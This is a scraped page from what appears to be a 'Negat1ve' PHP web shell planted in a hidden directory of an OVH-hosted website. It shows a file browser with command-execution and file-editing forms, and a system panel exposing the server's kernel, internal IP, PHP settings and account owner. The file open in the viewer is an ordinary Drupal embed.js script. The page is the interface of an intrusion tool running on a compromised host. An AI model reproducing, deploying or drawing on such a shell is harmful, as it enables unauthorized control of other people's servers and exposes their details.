Linux webm017.cluster127.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
Apache
10.127.20.17
/
home
/
m
/
a
/
t
/
matisecojj
/
private
/
embed
/
js
[ HOME ]
Exec
Submit
File Name : embed.js
/** * @file * Drupal Embed module. */ (function ($, Drupal) { 'use strict'; /** * Attaches or detaches behaviors, except the ones we do not want. * * @param {string} action * Either 'attach' or 'detach'. * @param {HTMLDocument|HTMLElement} context * The context argument for Drupal.attachBehaviors()/detachBehaviors(). * @param {object} settings * The settings argument for Drupal.attachBehaviors()/detachBehaviors(). */ Drupal.runEmbedBehaviors = function (action, context, settings) { // Do not run the excluded behaviors. var stashed = {}; $.each(Drupal.embed.excludedBehaviors, function (i, behavior) { stashed[behavior] = Drupal.behaviors[behavior]; delete Drupal.behaviors[behavior]; }); // Run the remaining behaviors. (action === 'attach' ? Drupal.attachBehaviors : Drupal.detachBehaviors)(context, settings); // Put the stashed behaviors back in. $.extend(Drupal.behaviors, stashed); }; /** * Ajax 'embed_insert' command: insert the rendered embedded item. * * The regular Drupal.ajax.commands.insert() command cannot target elements * within iframes. This is a skimmed down equivalent that works no matter * whether the CKEditor is in iframe or div area mode. * * @param {Drupal.Ajax} ajax * An Ajax object. * @param {object} response * The Ajax response. * @param {string} response.data * The Ajax response's content. * @param {number} [status] * The HTTP status code. */ Drupal.AjaxCommands.prototype.embed_insert = function (ajax, response, status) { var $target = $(ajax.element); // No need to detach behaviors here, the widget is created fresh each time. $target.html(response.data); Drupal.runEmbedBehaviors('attach', $target.get(0), response.settings || ajax.settings); }; /** * Stores settings specific to Embed module. */ Drupal.embed = { /** * A list of behaviors which are to be excluded while attaching/detaching. * * - Drupal.behaviors.editor, to avoid editor inception. * - Drupal.behaviors.contextual, to keep contextual links hidden. */ excludedBehaviors: ['editor', 'contextual'] }; })(jQuery, Drupal);
Back
Folder Name
Submit
File Name
File Content
Submit
System Information
Uname > Linux webm017.cluster127.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64 Software > Apache PHP > 8.1.33 Protocol > HTTP/1.1 IP / Port > 10.127.20.17 / 443 Mail > ON Curl > ON Owner > matisecojj MySQL > OFF Disable Function > _dyuweyrj4,_dyuweyrj4r,dl
*ReClick For Close
File : Negat1ve /JFR/.thumb35363/index.php
Name
Type
Size
Owner/Group
Permission
Last Modified
Actions
.
dir
-
matisecojj/users
0755
2020-05-22 09:25:00
..
dir
-
matisecojj/users
0755
2024-08-29 11:06:02
embed.js
text/plain
2.2 KB
matisecojj/users
0644
2020-05-22 09:25:00
© Negat1ve